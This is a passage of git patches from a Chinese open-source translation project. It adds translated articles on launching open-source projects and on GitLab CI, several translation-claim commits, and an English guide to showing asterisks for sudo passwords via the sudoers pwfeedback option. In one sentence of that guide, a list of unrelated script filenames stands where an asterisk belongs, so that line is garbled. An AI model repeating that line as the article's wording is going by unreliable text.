-[How to Create an Open Source Program][8]
-
-[Tools for Managing Open Source Programs][9]
-
-[Measuring Your Open Source Program’s Success][10]
-
-[Effective Strategies for Recruiting Open Source Developers][11]
-
-[Participating in Open Source Communities][12]
-
-[Using Open Source Code][13]
-
---------------------------------------------------------------------------------
-
-via: https://www.linuxfoundation.org/blog/launching-open-source-project-free-guide/
-
-作者:[Sam Dean ][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linuxfoundation.org/author/sdean/
-[1]:https://www.linuxfoundation.org/resources/open-source-guides/starting-open-source-project/
-[2]:https://www.linux.com/blog/learn/chapter/open-source-management/2017/5/googles-new-home-all-things-open-source-runs-deep
-[3]:https://www.linuxfoundation.org/using-open-source-code/
-[4]:https://www.linuxfoundation.org/participating-open-source-communities/
-[5]:https://www.linuxfoundation.org/resources/open-source-guides/starting-open-source-project/
-[6]:https://github.com/todogroup/guides
-[7]:https://github.com/todogroup/guides
-[8]:https://github.com/todogroup/guides/blob/master/creating-an-open-source-program.md
-[9]:https://www.linuxfoundation.org/blog/managing-open-source-programs-free-guide/
-[10]:https://www.linuxfoundation.org/measuring-your-open-source-program-success/
-[11]:https://www.linuxfoundation.org/blog/effective-strategies-recruiting-open-source-developers/
-[12]:https://www.linuxfoundation.org/participating-open-source-communities/
-[13]:https://www.linuxfoundation.org/using-open-source-code/
-[14]:https://www.linuxfoundation.org/author/sdean/
-[15]:https://www.linuxfoundation.org/category/audience/attorneys/
-[16]:https://www.linuxfoundation.org/category/blog/
-[17]:https://www.linuxfoundation.org/category/audience/c-level/
-[18]:https://www.linuxfoundation.org/category/audience/developer-influencers/
-[19]:https://www.linuxfoundation.org/category/audience/entrepreneurs/
-[20]:https://www.linuxfoundation.org/category/content-placement/lf-brand/
-[21]:https://www.linuxfoundation.org/category/audience/open-source-developers/
-[22]:https://www.linuxfoundation.org/category/audience/open-source-professionals/
-[23]:https://www.linuxfoundation.org/category/audience/open-source-users/
From da5a906edad1bf0d3d8adafdaf0e98eaf4b853ed Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sun, 7 Jan 2018 20:39:43 +0800
Subject: [PATCH 145/371] translated
Launching an Open Source Project: A Free Guide
---
...ing an Open Source Project A Free Guide.md | 79 +++++++++++++++++++
1 file changed, 79 insertions(+)
create mode 100644 translated/tech/20171201 Launching an Open Source Project A Free Guide.md
diff --git a/translated/tech/20171201 Launching an Open Source Project A Free Guide.md b/translated/tech/20171201 Launching an Open Source Project A Free Guide.md
new file mode 100644
index 0000000000..843b057a99
--- /dev/null
+++ b/translated/tech/20171201 Launching an Open Source Project A Free Guide.md
@@ -0,0 +1,79 @@
+启动开源项目:免费指导!
+============================================================
+
+![](https://www.linuxfoundation.org/wp-content/uploads/2017/11/project-launch-1024x645.jpg)
+
+启动项目、组建社区支持可能会比较复杂,但是这个全新的指南可以帮助你开启开源项目。
+
+不同规模的组织、技术人员和 DecOps 工作者选择使用甚至被要求开发自己的开源项目,开源程序变得越来越普遍。从 Google 到 Netflix 再到 Facebook 的这些公司都在发布它们的开源创作到开源社区。一个开源项目由内部人员组织起来,再由外部开发人员合作,帮助丰富开源项目是很常见的。
+
+不管怎样,在你看来开启一个开源项目、组建社区支持还是很复杂。一些前期准备可以帮助事情开展变得顺利,就是这个崭新且全新的开源项目指南 [ 启动一个开源项目 ][1]。
+
+这个免费指南是为了帮助那些深谙开源的组织者启动自己的开源项目而诞生。在本文的开始,介绍包括了决定开源什么项目,预计项目费用,考虑开源协议和一些其他方面。开源项目这种方式可能源自国外,但是从 Google 到 Facebook 这样一些主要的开源公司都已经开放提供了开源项目指导资源。事实上,Google 拥有的 [ 丰富的在线地址 ][2] 在开源项目实践和启动开源项目上持续贡献。
+
+Capital One 开源社区经理 Jared Smith 指出,“无论公司在内雇佣了多少聪明人,总还是有聪明人在公司之外”, “我们发现开放我们的源代码给外面世界的专业且愿意分享的人士交流经验是非常值得的,我们能从中获取一些非常好的建议”。
+
+新指南中,开源专家 Ibrahim Haddad 提供了了五条关于一个组织为什么要在新项目中开放源代码的原因:
+
+1. 促成开放式问题解决方案;提供标准参考成就;共享战略功能开发开销。
+
+2. 商品化市场;减少非战略软件成本费用。
+
+3. 建立产品生态,驱动需求。
+
+4. 协同合作;吸引客户;深化共同目标间的关系。
+
+5. 提供用户自我支持的能里:无需等待即可调整代码
+
+本文指出:“做出开放或创建一个新的开源项目的决定和自身境况相关。你的公司应该在使用或贡献既存的开源项目上拥有一定程度的熟练度。这是因为消费能够指导你,通过外部工程使开发者对自己的产品构建变得省力(在我们的指南 [ 使用开源代码 ][3] 和 [ 加入开源社区 ][4] 上)。但是当一旦你顺利的参与过开源,那这将是启动你自己的开源项目的最佳时机”
+
+这些免费的教程是基于专业的开源领导人而创作的。[ 在这里可以查看所有指南 ][7] 然后关注我们的后续报导。
+
+也别错过了本系列早些的文章:
+
+[ 如何创建开源程序 ][8]
+
+[ 开源程序管理工具 ][9]
+
+[ 衡量你的开源项目成功性 ][10]
+
+[ 吸引开源开发者的高效策略 ][11]
+
+[ 加入开源社区 ][12]
+
+[ 使用开源代码 ][13]
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxfoundation.org/blog/launching-open-source-project-free-guide/
+
+作者:[Sam Dean ][a]
+译者:[译者ID](https://github.com/CYLeft)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxfoundation.org/author/sdean/
+[1]:https://www.linuxfoundation.org/resources/open-source-guides/starting-open-source-project/
+[2]:https://www.linux.com/blog/learn/chapter/open-source-management/2017/5/googles-new-home-all-things-open-source-runs-deep
+[3]:https://www.linuxfoundation.org/using-open-source-code/
+[4]:https://www.linuxfoundation.org/participating-open-source-communities/
+[5]:https://www.linuxfoundation.org/resources/open-source-guides/starting-open-source-project/
+[6]:https://github.com/todogroup/guides
+[7]:https://github.com/todogroup/guides
+[8]:https://github.com/todogroup/guides/blob/master/creating-an-open-source-program.md
+[9]:https://www.linuxfoundation.org/blog/managing-open-source-programs-free-guide/
+[10]:https://www.linuxfoundation.org/measuring-your-open-source-program-success/
+[11]:https://www.linuxfoundation.org/blog/effective-strategies-recruiting-open-source-developers/
+[12]:https://www.linuxfoundation.org/participating-open-source-communities/
+[13]:https://www.linuxfoundation.org/using-open-source-code/
+[14]:https://www.linuxfoundation.org/author/sdean/
+[15]:https://www.linuxfoundation.org/category/audience/attorneys/
+[16]:https://www.linuxfoundation.org/category/blog/
+[17]:https://www.linuxfoundation.org/category/audience/c-level/
+[18]:https://www.linuxfoundation.org/category/audience/developer-influencers/
+[19]:https://www.linuxfoundation.org/category/audience/entrepreneurs/
+[20]:https://www.linuxfoundation.org/category/content-placement/lf-brand/
+[21]:https://www.linuxfoundation.org/category/audience/open-source-developers/
+[22]:https://www.linuxfoundation.org/category/audience/open-source-professionals/
+[23]:https://www.linuxfoundation.org/category/audience/open-source-users/
From 39da9557e6c6132ae3adb9a8a07ff9c65164dd7e Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sun, 7 Jan 2018 20:46:21 +0800
Subject: [PATCH 146/371] [apply for translation]
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Linux/Unix desktop fun: Simulates the display from “The Matrix”
---
...-Unix desktop fun- Simulates the display from -The Matrix.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md b/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
index 9935f2a796..5c73a7458c 100644
--- a/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
+++ b/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
@@ -1,3 +1,5 @@
+translating by CYLeft
+
Linux/Unix desktop fun: Simulates the display from “The Matrix”
======
The Matrix is a science fiction action movie from 1999. It was written and directed by the Wachowski Brothers. The film has falling green characters on screen. The digital rain is representing the activity of the virtual reality in "The Matrix." You can now have Matrix digital rain with CMatrix on a Linux or Unix terminal too.
From c3bc479acb4beeaec4d39c5792a1089edea00324 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sun, 7 Jan 2018 20:48:23 +0800
Subject: [PATCH 147/371] [apply for translation]
cURL vs. wget: Their Differences, Usage and Which One You Should Use
---
...et- Their Differences, Usage and Which One You Should Use.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md b/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
index 9d62198d6a..1ffeac62bc 100644
--- a/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
+++ b/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
@@ -1,3 +1,5 @@
+translating by CYLeft
+
cURL vs. wget: Their Differences, Usage and Which One You Should Use
======
![](https://www.maketecheasier.com/assets/uploads/2017/12/wgc-feat.jpg)
From aa42addae1f0f2a40a3e539f70097ce01d72659b Mon Sep 17 00:00:00 2001
From: FelixYFZ <33593534+FelixYFZ@users.noreply.github.com>
Date: Sun, 7 Jan 2018 21:21:29 +0800
Subject: [PATCH 148/371] Update 20171010 How to test internet speed in Linux
terminal.md
---
.../20171010 How to test internet speed in Linux terminal.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171010 How to test internet speed in Linux terminal.md b/sources/tech/20171010 How to test internet speed in Linux terminal.md
index 73e0a7f236..85c1832153 100644
--- a/sources/tech/20171010 How to test internet speed in Linux terminal.md
+++ b/sources/tech/20171010 How to test internet speed in Linux terminal.md
@@ -1,3 +1,4 @@
+Translating by FelixYFZ
How to test internet speed in Linux terminal
======
Learn how to use speedtest cli tool to test internet speed in Linux terminal. Also includes one liner python command to get speed details right away.
From 7c8404ca6a889f6aa0ac668948f4df4081f540e2 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 21:57:54 +0800
Subject: [PATCH 149/371] PRF&PUB:20171128 A generic introduction to Gitlab
CI.md
@lujun9972
---
...128 A generic introduction to Gitlab CI.md | 132 ++++++++++++++++++
...128 A generic introduction to Gitlab CI.md | 129 -----------------
2 files changed, 132 insertions(+), 129 deletions(-)
create mode 100644 published/20171128 A generic introduction to Gitlab CI.md
delete mode 100644 translated/tech/20171128 A generic introduction to Gitlab CI.md
diff --git a/published/20171128 A generic introduction to Gitlab CI.md b/published/20171128 A generic introduction to Gitlab CI.md
new file mode 100644
index 0000000000..223f5b4aca
--- /dev/null
+++ b/published/20171128 A generic introduction to Gitlab CI.md
@@ -0,0 +1,132 @@
+Gitlab CI 常规介绍
+======
+
+在 [fleetster][1], 我们搭建了自己的 [Gitlab][2] 实例,而且我们大量使用了 [Gitlab CI][3]。我们的设计师和测试人员也都在用它,也很喜欢用它,它的那些高级功能特别棒。
+
+Gitlab CI 是一个功能非常强大的持续集成系统,有很多不同的功能,而且每次发布都会增加新的功能。它的技术文档也很丰富,但是对那些要在已经配置好的 Gitlab 上使用它的用户来说,它缺乏一个一般性介绍。设计师或者测试人员是无需知道如何通过 Kubernetes 来实现自动伸缩,也无需知道“镜像”和“服务”之间的不同的。
+
+但是,他仍然需要知道什么是“管道”,知道如何查看部署到一个“环境”中的分支。因此,在本文中,我会尽可能覆盖更多的功能,重点放在最终用户应该如何使用它们上;在过去的几个月里,我向我们团队中的某些人包括开发者讲解了这些功能:不是所有人都知道持续集成(CI)是个什么东西,也不是所有人都用过 Gitlab CI。
+
+如果你想了解为什么持续集成那么重要,我建议阅读一下 [这篇文章][4],至于为什么要选择 Gitlab CI 呢,你可以去看看 [Gitlab.com][3] 上的说明。
+
+### 简介
+
+开发者保存更改代码的动作叫做一次提交。然后他可以将这次提交推送到 Gitlab 上,这样可以其他开发者就可以复查这些代码了。
+
+Gitlab CI 配置好后,Gitlab 也能对这个提交做出一些处理。该处理的工作由一个运行器来执行的。所谓运行器基本上就是一台服务器(也可以是其他的东西,比如你的 PC 机,但我们可以简单称其为服务器)。这台服务器执行 `.gitlab-ci.yml` 文件中指令,并将执行结果返回给 Gitlab 本身,然后在 Gitlab 的图形化界面上显示出来。
+
+开发者完成一项新功能的开发或完成一个 bug 的修复后(这些动作通常包含了多次的提交),就可以发起一个合并请求,团队其他成员则可以在这个合并请求中对代码及其实现进行评论。
+
+我们随后会看到,由于 Gitlab CI 提供的两大特性,环境 与 制品,使得设计者和测试人员也能(而且真的需要)参与到这个过程中来,提供反馈以及改进意见。
+
+### 管道
+
+每个推送到 Gitlab 的提交都会产生一个与该提交关联的管道。若一次推送包含了多个提交,则管道与最后那个提交相关联。管道就是一个分成不同阶段的作业的集合。
+
+同一阶段的所有作业会并发执行(在有足够运行器的前提下),而下一阶段则只会在上一阶段所有作业都运行并返回成功后才会开始。
+
+只要有一个作业失败了,整个管道就失败了。不过我们后面会看到,这其中有一个例外:若某个作业被标注成了手工运行,那么即使失败了也不会让整个管道失败。
+
+阶段则只是对批量的作业的一个逻辑上的划分,若前一个阶段执行失败了,则后一个执行也没什么意义了。比如我们可能有一个构建阶段和一个部署阶段,在构建阶段运行所有用于构建应用的作业,而在部署阶段,会部署构建出来的应用程序。而部署一个构建失败的东西是没有什么意义的,不是吗?
+
+同一阶段的作业之间不能有依赖关系,但它们可以依赖于前一阶段的作业运行结果。
+
+让我们来看一下 Gitlab 是如何展示阶段与阶段状态的相关信息的。
+
+![pipeline-overview][5]
+
+![pipeline-status][6]
+
+### 作业
+
+作业就是运行器要执行的指令集合。你可以实时地看到作业的输出结果,这样开发者就能知道作业为什么失败了。
+
+作业可以是自动执行的,也就是当推送提交后自动开始执行,也可以手工执行。手工作业必须由某个人手工触发。手工作业也有其独特的作用,比如,实现自动化部署,但只有在有人手工授权的情况下才能开始部署。这是限制哪些人可以运行作业的一种方式,这样只有信赖的人才能进行部署,以继续前面的实例。
+
+作业也可以建构出制品来以供用户下载,比如可以构建出一个 APK 让你来下载,然后在你的设备中进行测试; 通过这种方式,设计者和测试人员都可以下载应用并进行测试,而无需开发人员的帮助。
+
+除了生成制品外,作业也可以部署`环境`,通常这个环境可以通过 URL 访问,让用户来测试对应的提交。
+
+做作业状态与阶段状态是一样的:实际上,阶段的状态就是继承自作业的。
+
+![running-job][7]
+
+### 制品
+
+如前所述,作业能够生成制品供用户下载来测试。这个制品可以是任何东西,比如 Windows 上的应用程序,PC 生成的图片,甚至 Android 上的 APK。
+
+那么,假设你是个设计师,被分配了一个合并请求:你需要验证新设计的实现!
+
+要该怎么做呢?
+
+你需要打开该合并请求,下载这个制品,如下图所示。
+
+每个管道从所有作业中搜集所有的制品,而且一个作业中可以有多个制品。当你点击下载按钮时,会有一个下拉框让你选择下载哪个制品。检查之后你就可以评论这个合并请求了。
+
+你也可以从没有合并请求的管道中下载制品 ;-)
+
+我之所以关注合并请求是因为通常这正是测试人员、设计师和相关人员开始工作的地方。
+
+但是这并不意味着合并请求和管道就是绑死在一起的:虽然它们结合的很好,但两者之间并没有什么关系。
+
+![download-artifacts][8]
+
+### 环境
+
+类似的,作业可以将某些东西部署到外部服务器上去,以便你可以通过合并请求本身访问这些内容。
+
+如你所见,环境有一个名字和一个链接。只需点击链接你就能够转至你的应用的部署版本上去了(当前,前提是配置是正确的)。
+
+Gitlab 还有其他一些很酷的环境相关的特性,比如 [监控][9],你可以通过点击环境的名字来查看。
+
+![environment][10]
+
+### 总结
+
+这是对 Gitlab CI 中某些功能的一个简单介绍:它非常强大,使用得当的话,可以让整个团队使用一个工具完成从计划到部署的工具。由于每个月都会推出很多新功能,因此请时刻关注 [Gitlab 博客][11]。
+
+若想知道如何对它进行设置或想了解它的高级功能,请参阅它的[文档][12]。
+
+在 fleetster,我们不仅用它来跑测试,而且用它来自动生成各种版本的软件,并自动发布到测试环境中去。我们也自动化了其他工作(构建应用并将之发布到 Play Store 中等其它工作)。
+
+说起来,**你是否想和我以及其他很多超棒的人一起在一个年轻而又富有活力的办公室中工作呢?** 看看 fleetster 的这些[招聘职位][13] 吧!
+
+赞美 Gitlab 团队 (和其他在空闲时间提供帮助的人),他们的工作太棒了!
+
+若对本文有任何问题或回馈,请给我发邮件:[riccardo@rpadovani.com][14] 或者[发推给我][15]:-) 你可以建议我增加内容,或者以更清晰的方式重写内容(英文不是我的母语)。
+
+
+那么,再见吧,
+
+R.
+
+P.S:如果你觉得本文有用,而且希望我们写出其他文章的话,请问您是否愿意帮我[买杯啤酒给我][17] 让我进入 [鲍尔默峰值][16]?
+
+--------------------------------------------------------------------------------
+
+via: https://rpadovani.com/introduction-gitlab-ci
+
+作者:[Riccardo][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://rpadovani.com
+[1]:https://www.fleetster.net
+[2]:https://gitlab.com/
+[3]:https://about.gitlab.com/gitlab-ci/
+[4]:https://about.gitlab.com/2015/02/03/7-reasons-why-you-should-be-using-ci/
+[5]:https://img.rpadovani.com/posts/pipeline-overview.png
+[6]:https://img.rpadovani.com/posts/pipeline-status.png
+[7]:https://img.rpadovani.com/posts/running-job.png
+[8]:https://img.rpadovani.com/posts/download-artifacts.png
+[9]:https://gitlab.com/help/ci/environments.md
+[10]:https://img.rpadovani.com/posts/environment.png
+[11]:https://about.gitlab.com/
+[12]:https://docs.gitlab.com/ee/ci/README.html
+[13]:https://www.fleetster.net/fleetster-team.html
+[14]:mailto:riccardo@rpadovani.com
+[15]:https://twitter.com/rpadovani93
+[16]:https://www.xkcd.com/323/
+[17]:https://rpadovani.com/donations
diff --git a/translated/tech/20171128 A generic introduction to Gitlab CI.md b/translated/tech/20171128 A generic introduction to Gitlab CI.md
deleted file mode 100644
index 41dcc5d359..0000000000
--- a/translated/tech/20171128 A generic introduction to Gitlab CI.md
+++ /dev/null
@@ -1,129 +0,0 @@
-Gitlab CI 漫谈
-======
-我们在 [fleetster][1] 中搭建了自己的 [Gitlab][2] 实例,而且我们大量使用了 [Gitlab CI][3]。而且我们的设计师和 QA 也都在用它,也很喜欢用它,它的那些高级功能特别棒。
-
-Gitlab CI 是一个功能非常强大的持续集成系统,有很多不同的功能,而且每次发布都会增加新的功能。它的技术文档也很丰富,但是它缺乏一个面向使用已经配置好的 Gitlab 用户的一般性的介绍。一个设计师或者测试人员是无需知道如何通过 Kubernetes 来实现自动伸缩,也无需知道`镜像`和`服务`之间的不同的。
-
-但是,他仍然需要知道什么是`管道`,如何查看部署到一个`环境`中的分支。因此,在本文中,我会尽可能覆盖更多的功能,关注最终用户应该如何使用 Gitlab; 在过去的几个月里,我向我们团队中的某些人包括开发者讲解了这些功能:不是所有人都知道持续集成是个什么东西,也不是所有人都用过 Gitlab CI。
-
-如果你想了解为什么持续集成那么重要,我建议阅读一下 [这篇文章 ][4],至于为什么要选择 Gitlab CI 呢,你可以去看看 [Gitlab.com][3] 上的说明。
-
-### 简介
-
-开发者保存更改代码的动作叫做一次`提交`。然后他可以将这次提交推送到 Gitlab 上,这样可以其他开发者就可以复查这些代码了。
-
-Gitlab CI 配置好后,Gitlab 也能对这个提交做出一些处理。该处理的工作由一个 `runner` 来执行。所谓 runner 一本上就是一台服务器(也可以是其他的东西,比如你的 PC 机,但我们只是简单的把它看成是一台服务器)。这台服务器执行 `.gitlab-ci.yml` 文件中指令并将执行结果返回给 Gitlab 本身,然后在 Gitlab 的图形化界面上显示出来。
-
-开发者完成一项新功能的开发或完成一个 bug 的修复后(这些动作通常包含了多次的提交),就可以发起一个 `合并请求`,团队其他成员则可以在这个合并请求中对代码和实现进行评论。
-
-我们随后会看到,由于 Gitlab CI 提供的两大特性,`environments` 与 `artifacts`,使得设计者和测试人员也能(而且真的需要!)参与到这个过程中来,提供反馈以及改进意见。
-
-### 管道 (Pipelines)
-
-每个推送到 Gitlab 的提交都会产生一个与该提交关联的`管道`。若一次推送包含了多个提交,则管道与最后那个提交相关联。一个管道就是一个分`阶段`的`作业`的集合。
-
-同一阶段的所有作业会并发执行(在有足够 runner 的前提下),而下一阶段则只会在上一阶段所有作业都运行并返回成功后才会开始。
-
-只要有一个作业失败了,整个管道就失败了。不过我们后面会看到,这其中有一个例外:若某个作业被标注成了手工运行,那么即使失败了也不会让整个管道失败。
-
-阶段则只是对作业批量集合间的一个逻辑上的划分,若前一个任务集合执行失败了,则后一个执行也没什么意义了。比如我们可能有一个`构建`阶段和一个`部署`阶段,在这`构建`阶段运行所有用于构建应用的作业,而在`部署`阶段,会部署构建出来的应用程序。而部署一个构建失败的东西是没有什么意义的,不是吗?
-
-同一阶段的作业之间不能有依赖关系,但他们可以依赖于前一阶段的作业运行结果。
-
-让我们来看一下 Gitlab 是如何展示阶段与阶段状态的相关信息的。
-
-![pipeline-overview][5]
-
-![pipeline-status][6]
-
-### 作业
-
-作业就是 runner 执行的指令集合。你可以实时地看到作业的输出结果,这样开发者就能知道作业为什么失败了。
-
-作业可以是自动执行的,也就是当推送提交后自动开始执行,也可以手工执行。手工作业必须由某个人手工触发。手工作业也有其独特的作用,比如,实现自动化部署,但只有在有人手工授权的情况下才能开始部署。这是限制哪些人可以运行作业的一种方式,这样只有信赖的人才能进行部署,to continue the example before。
-
-作业也可以建构出 `制品 (artifacts)` 来以供用户下载,比如可以构建出一个 APK 让你来下载,然后在你的设备中进行测试; 通过这种方式,设计者和测试人员都可以下载应用并进行测试,而无需开发人员的帮助。
-
-除了生成制品外,作业也可以部署`环境`,通常这个环境可以通过 URL 访问,让用户来测试对应的提交。
-
-做作业状态与阶段状态是一样的:实际上,阶段的状态就是继承自作业的。
-
-![running-job][7]
-
-### 制品 (Artifacts)
-
-如前所述,作业能够生成制品供用户下载来测试。这个制品可以是任何东西,比如 windows 上的应用程序,PC 生成的图片,甚至 Android 上的 APK。
-
-那么,假设你是个设计师,被分配了一个合并请求:你需要验证新设计的实现!
-
-要改怎么做呢?
-
-你需要打开该合并请求,下载制品,如图所示。
-
-每个管道从所有作业中搜集所有的制品,而且一个作业中可以有多个制品。当你点击下载按钮时,会有一个下拉框让你选择下载哪个制品。检查之后你就可以评论这个合并请求了。
-
-你也可以从没有合并请求的管道中下载制品 ;-)
-
-我之所以关注合并请求是因为通常这正是测试人员,设计师和股东开始工作的地方。
-
-但是这并不意味着合并请求和管道就是绑死在一起的:虽然他们结合的很好,但两者之间并没有什么关系。
-
-![download-artifacts][8]
-
-### 环境
-
-类似的,作业可以将某些东西部署到外部服务器上去,似的可以通过合并请求本身访问这些内容。
-
-如你所见,环境有一个名字和一个链接。只需点击链接你就能够转至应用的部署版本上去了(当前,前提是配置是正确的)。
-
-Gitlab 还有其他一些很酷的环境相关的特性,比如 [监控 ][9],你可以通过点击环境的名字来查看。
-
-![environment][10]
-
-### 总结
-
-这是对 Gitlab CI 中某些功能的一个简单介绍:它非常强大,使用得当的话,可以让整个团队使用一个工具完成从计划到部署的工具。由于每个月都会推出很多新功能,因此请时刻关注 [Gitlab 博客 ][11]。
-
-若想知道如何对它进行设置或想了解它的高级功能,请参阅它的[文档 ][12]。
-
-在 fleetster 中,我们不仅用它来跑测试,而且用它来自动生成各种版本的软件,并自动发布到测试环境中去。我们也自动化了其他工作(构建应用并将之发布到 Play Store 中等其他工作)。
-
-说起来,**你是否想和我以及其他很多超棒的人一起在一个年轻而又富有活力的办公室中工作呢?** 看看 fleetster 的这些[开放职位 ][13] 吧!
-
-赞美 Gitlab 团队 (和其他在空闲时间提供帮助的人),他们的工作太棒了!
-
-若对本文有任何问题或回馈,请给我发邮件:[riccardo@rpadovani.com][14] 或者[发推给我 ][15]:-) 你可以建议我增加内容,或者以更清晰的方式重写内容(英文不是我的母语)。
-
-那么,再见吧,
-R。
-
-P.S:如果你觉得本文有用,而且希望我们写出其他文章的话,请问您是否愿意帮我[买被啤酒给我 ][17] 让我进入 [鲍尔默峰值 ][16]?
-
---------------------------------------------------------------------------------
-
-via: https://rpadovani.com/introduction-gitlab-ci
-
-作者:[Riccardo][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://rpadovani.com
-[1]:https://www.fleetster.net
-[2]:https://gitlab.com/
-[3]:https://about.gitlab.com/gitlab-ci/
-[4]:https://about.gitlab.com/2015/02/03/7-reasons-why-you-should-be-using-ci/
-[5]:https://img.rpadovani.com/posts/pipeline-overview.png
-[6]:https://img.rpadovani.com/posts/pipeline-status.png
-[7]:https://img.rpadovani.com/posts/running-job.png
-[8]:https://img.rpadovani.com/posts/download-artifacts.png
-[9]:https://gitlab.com/help/ci/environments.md
-[10]:https://img.rpadovani.com/posts/environment.png
-[11]:https://about.gitlab.com/
-[12]:https://docs.gitlab.com/ee/ci/README.html
-[13]:https://www.fleetster.net/fleetster-team.html
-[14]:mailto:riccardo@rpadovani.com
-[15]:https://twitter.com/rpadovani93
-[16]:https://www.xkcd.com/323/
-[17]:https://rpadovani.com/donations
From 4f548f6b72b42b0381a9da1978972889ace660a1 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 23:03:55 +0800
Subject: [PATCH 150/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Displa?=
=?UTF-8?q?y=20Asterisks=20When=20You=20Type=20Password=20In=20terminal?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...isks When You Type Password In terminal.md | 70 +++++++++++++++++++
1 file changed, 70 insertions(+)
create mode 100644 sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
diff --git a/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md b/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
new file mode 100644
index 0000000000..d0d8328370
--- /dev/null
+++ b/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
@@ -0,0 +1,70 @@
+How To Display Asterisks When You Type Password In terminal
+======
+
+![](https://www.ostechnix.com/wp-content/uploads/2018/01/Display-Asterisks-When-You-Type-Password-In-terminal-1-720x340.png)
+
+When you type passwords in a web browser login or any GUI login, the passwords will be masked as asterisks like 0_sync_master.sh 1_add_new_article_manual.sh 1_add_new_article_newspaper.sh 2_start_translating.sh 3_continue_the_work.sh 4_finish.sh 5_pause.sh base.sh env format.test lctt.cfg parse_url_by_manual.sh parse_url_by_newspaper.py parse_url_by_newspaper.sh README.org reedit.sh reformat.sh or bullets like •••••••••••••. This is the built-in security mechanism to prevent the users near you to view your password. But when you type the password in Terminal to perform any administrative task with **sudo** or **su** , you won't even the see the asterisks or bullets as you type the password. There won't be any visual indication of entering passwords, there won't be any cursor movement, nothing at all. You will not know whether you entered all characters or not. All you will see just a blank screen!
+
+Look at the following screenshot.
+
+![][2]
+
+As you see in the above image, I've already entered the password, but there was no indication (either asterisks or bullets). Now, I am not sure whether I entered all characters in my password or not. This security mechanism also prevents the person near you to guess the password length. Of course, this behavior can be changed. This is what this guide all about. It is not that difficult. Read on!
+
+#### Display Asterisks When You Type Password In terminal
+
+To display asterisks as you type password in Terminal, we need to make a small modification in **" /etc/sudoers"** file. Before making any changes, it is better to backup this file. To do so, just run:
+```
+sudo cp /etc/sudoers{,.bak}
+```
+
+The above command will backup /etc/sudoers file to a new file named /etc/sudoers.bak. You can restore it, just in case something went wrong after editing the file.
+
+Next, edit **" /etc/sudoers"** file using command:
+```
+sudo visudo
+```
+
+Find the following line:
+```
+Defaults env_reset
+```
+
+![][3]
+
+Add an extra word **" ,pwfeedback"** to the end of that line as shown below.
+```
+Defaults env_reset,pwfeedback
+```
+
+![][4]
+
+Then, press **" CTRL+x"** and **" y"** to save and close the file. Restart your Terminal to take effect the changes.
+
+Now, you will see asterisks when you enter password in Terminal.
+
+![][5]
+
+If you're not comfortable to see a blank screen when you type passwords in Terminal, the small tweak will help. Please be aware that the other users can predict the password length if they see the password when you type it. If you don't mind it, go ahead make the changes as described above to make your password visible (masked as asterisks, of course!).
+
+And, that's all for now. More good stuffs to come. Stay tuned!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/display-asterisks-type-password-terminal/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[2]:http://www.ostechnix.com/wp-content/uploads/2018/01/password-1.png ()
+[3]:http://www.ostechnix.com/wp-content/uploads/2018/01/visudo-1.png ()
+[4]:http://www.ostechnix.com/wp-content/uploads/2018/01/visudo-1-1.png ()
+[5]:http://www.ostechnix.com/wp-content/uploads/2018/01/visudo-2.png ()
From df3691aab2653a9401d245e4002390236b0270ca Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 23:16:58 +0800
Subject: [PATCH 151/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Containers=20with?=
=?UTF-8?q?out=20Docker=20at=20Red=20Hat?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
